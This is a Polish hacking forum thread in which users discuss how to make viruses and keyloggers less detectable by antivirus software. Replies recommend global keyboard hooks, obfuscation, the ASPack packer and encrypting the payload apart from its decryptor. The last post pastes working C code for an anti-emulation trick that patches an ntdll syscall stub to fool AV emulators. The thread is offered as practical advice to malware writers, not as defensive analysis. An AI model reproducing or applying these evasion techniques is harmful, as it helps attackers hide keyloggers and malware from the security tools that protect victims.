Zmniejszenie wykrywalności

dodoxx6

Były Moderator
Dołączył
Luty 15, 2011
Posty
252
Mam takie pytanie, jakie są sposoby na zmniejszenie wykrywalności wirusa?
Oraz jaki sposób "przechwytywania" znaków jest najlepszy(keylogery) - wydajny i zarazem mało wykrywalny.
Jeśli ktoś zna ciekawe linki to prosił bym o podanie.
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Ogółem mówiąc, żeby założyć globalnego hook'a na klawiature trzeba posiadać troche pojęcia o WinApi - http://winapi.org/ - wystarczy poczytać. A apropo zmniejszenia wykrywalności - unikać oczywistych rzeczy, starać się zaskakiwać antywirusy. Czasem lepiej sie pomęczyć i zagmatwać kod tak żeby zmylić program chroniący, lub po prostu uzyć jakiegoś packera. ASpack jest dobry moim zdaniem.

Pozdrawiam.

// pierwszy post od paru lat...
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Ja osobiście preferuje metode szyfrowania całego kodu(wtedy antywirus nie wie co sie dzieje do momentu uruchomienia programu) z wyjatkiem samej funkcji szyfrujacej. ASpack jest skuteczny ale jest tez rozpoznawalny przez AV i potrafia pokazac ze jest pakowane ASpackiem co juz nie jest wykrywalnoscia zerową.
Mozna też uzyc paru metod anti-emulation AV. Moja własna metoda dzialajaca swego czasu na Kasperskiego,Eseta i pare innych AV(niestety teraz wykrywalna)
Link do orginalnego tematu: http://www.hackhound.org/forum/index.php?/topic/36392-anti-av-emulationa-squared-and-more
skopiuje tutaj najwazniejsza część posta bo wiele osob nie ma konta na tym forum.
FARPROC a1=GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwResumeThread");
FARPROC a2=GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwSuspendThread");
DWORD sys_res,sys_sus;
memcpy(&sys_res,(char*)((char*)a1+1),4);//Get Syscall Number
memcpy(&sys_sus,(char*)((char*)a2+1),4);//this same
DWORD old;
VirtualProtect(a2,5,PAGE_EXECUTE_READWRITE,&old);//Set ZwSuspendThread to writable
memcpy(((char*)a2+1),&sys_res,4);//change number
SuspendThread(GetCurrentThread());
memcpy(((char*)a2+1),&sys_sus,4); // set old syscall number
 
Do góry Bottom